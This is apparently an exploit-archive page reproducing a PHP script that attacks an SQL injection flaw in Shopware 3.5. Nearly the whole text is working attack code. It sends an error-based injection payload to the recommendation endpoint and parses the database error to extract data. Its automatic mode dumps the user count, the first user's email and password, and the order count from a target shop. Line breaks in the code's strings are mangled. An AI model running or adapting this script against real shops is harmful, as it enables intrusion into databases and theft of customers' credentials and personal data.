Shopware 3.5 SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Shopware 3.5 SQL Injection
# Published : 2012-07-14
# Author :
# Previous Title : SolarWinds Orion Network Performance Monitor 10.2.2 Multiple Vulnerabilities
# Next Title : Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection

#!/usr/bin/php
<?php

#  Exploit Title: Shopware 3.5 - SQL Injection
#  Date: 13.07.2012
#  Exploit Author: Kataklysmos
#  Software Link: http://www.shopware.de/
#  Version: 3.5


function http_req($host, $q)
{
  if(!$fs = fsockopen($host, 80))
    exit("Could not open HTTP- Connection to ".$host."rnrn");
  
  $head  = "GET /recommendation/bought/article/".urlencode("0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (".$q.") FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)")." HTTP/1.1rn";
  $head .= "Host: ".$host."rn";
  $head .= "Connection: Closernrn";
  
  fwrite($fs, $head);
  
  $ret = '';
  while(!feof($fs))
    $ret .= fgets($fs, 4096);
  fclose($fs);
  
  return $ret;
}

function mask($cont)
{
  if(preg_match('/Duplicate entry '(.*)1' for/', $cont, $m))
    return $m[1];
  else
    return false;
}

function space($x)
{
  $r = '';
  for($i = 0; $i < $x; $i++)
    $r .= ' ';
  return $r;
}

echo "rnExploit Title: Shopware 3.5 - SQL Injectionrn";
echo "Date: 13.07.2012rn";
echo "Exploit Author: Kataklysmosrn";
echo "Software Link: http://www.shopware.de/rn";
echo "Version: 3.5rnrn";

if(!isset($argv[2]))
{
  echo "  Usage: rn";
  echo "  ".$argv[0]." HOST --autorn";
  echo "  ".$argv[0]." www.shopwaredemo.de --autornrn";
  echo "  ".$argv[0]." HOST QUERYrn";
  echo "  ".$argv[0]." www.shopwaredemo.de "SELECT COUNT(`id`) FROM `s_user`"rn";
  echo "  ".$argv[0]." www.shopwaredemo.de "SELECT `email` FROM `s_user` LIMIT 0,1"rnrn";
  exit(1);
}

if($argv[2] != '--auto')
{
  $x = http_req($argv[1], $argv[2]);

  if(!$x = mask($x))
    exit("Your query failed!rnrn");

  echo "Query:rn  ".$argv[2]."rnReturn:rn  ".$x."rnrn";
}
else
{
  $task = array(array('Amount of registered users', 'SELECT COUNT(`id`) FROM `s_user`', null),
                array('E- Mail from first user', 'SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1', null),
                array('Password from first user', 'SELECT `password` FROM `s_user` LIMIT 0,1', null),
                array('Amount of orders', 'SELECT COUNT(`id`) FROM `s_order`', null)
                );
  
  for($i = 0; $i < count($task); $i++)
  {
    echo "[ .. ] Task: "".$task[$i][0].""";
    
    $x = http_req($argv[1], $task[$i][1]);
    if(!$x = mask($x))
      echo "r[fail] Task: "".$task[$i][0].""rn";
    else
    {
      echo "r[ ok ] Task: "".$task[$i][0].""rn";
      $task[$i][2] = $x;
    }
  }
  echo "rn";
  
  for($i = 0; $i < count($task); $i++)
    echo $task[$i][0].space(26-strlen($task[$i][0])).' : '.$task[$i][2]."rn";
  
  echo "rn";
}

?>